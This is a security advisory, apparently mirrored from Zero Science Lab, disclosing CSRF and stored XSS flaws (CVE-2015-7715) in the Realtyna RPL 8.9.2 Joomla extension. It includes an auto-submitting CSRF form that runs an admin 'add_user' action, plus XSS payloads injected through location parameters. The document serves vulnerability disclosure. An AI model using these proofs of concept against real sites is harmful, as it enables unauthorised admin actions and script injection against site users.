Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities

🗓️ 22 Oct 2015 00:00:00Reported by Bikramaditya GuhaHigh five to lqwrm and crash!Type

zeroscience🔗 www.zeroscience.mk👁 66 Views

Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities. Application allows actions via HTTP requests without validity checks. Multiple cross-site scripting vulnerabilities discovered

Reporter	Title	Published	Views	Family All 11
0day.today	Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities	23 Oct 201500:00	–	zdt
Circl	CVE-2015-7715	23 Oct 201500:00	–	circl
CNVD	Joomla! Realtyna RPL (com_rpl) component cross-site request forgery vulnerability	26 Oct 201700:00	–	cnvd
CVE	CVE-2015-7715	18 Oct 201718:00	–	cve
Cvelist	CVE-2015-7715	18 Oct 201718:00	–	cvelist
Exploit DB	Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery	23 Oct 201500:00	–	exploitdb
EUVD	EUVD-2015-7615	7 Oct 202500:30	–	euvd
exploitpack	Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery	23 Oct 201500:00	–	exploitpack
NVD	CVE-2015-7715	18 Oct 201718:29	–	nvd
Packet Storm	Realtyna RPL 8.9.2 CSRF / Cross Site Scripting	23 Oct 201500:00	–	packetstorm

<html><body><p>Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities


Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2

Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.


Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site. Multiple cross-site scripting vulnerabilities
were also discovered. The issue is triggered when input passed
via the multiple parameters is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Apache
           PHP/5.4.38


Vulnerability discovered by Bikramaditya 'PhoenixX' Guha


Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715


05.10.2015

--


1. CSRF:


</p>
<title>CSRF POC</title>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input name="option" type="hidden" value="com_rpl"/>
<input name="view" type="hidden" value="addon_membership_members"/>
<input name="format" type="hidden" value="ajax"/>
<input name="function" type="hidden" value="add_user"/>
<input name="id" type="hidden" value="85"/>
</form>
<script>
document.getElementById('formid').submit();
</script>




2. Cross Site Scripting (Stored):

http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr

Payloads:

option=com_rpl&amp;view=location_manager&amp;format=ajax&amp;new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&amp;new_location_fr_fr=&amp;level=1&amp;parent=&amp;function=add_location
option=com_rpl&amp;view=location_manager&amp;format=ajax&amp;new_location_en_gb=&amp;new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&amp;level=1&amp;parent=&amp;function=add_location
</body></html>

22 Oct 2015 00:00Current

7.5High risk

Vulners AI Score7.5

CVSS 26.8

CVSS 3.18.8

EPSS0.03061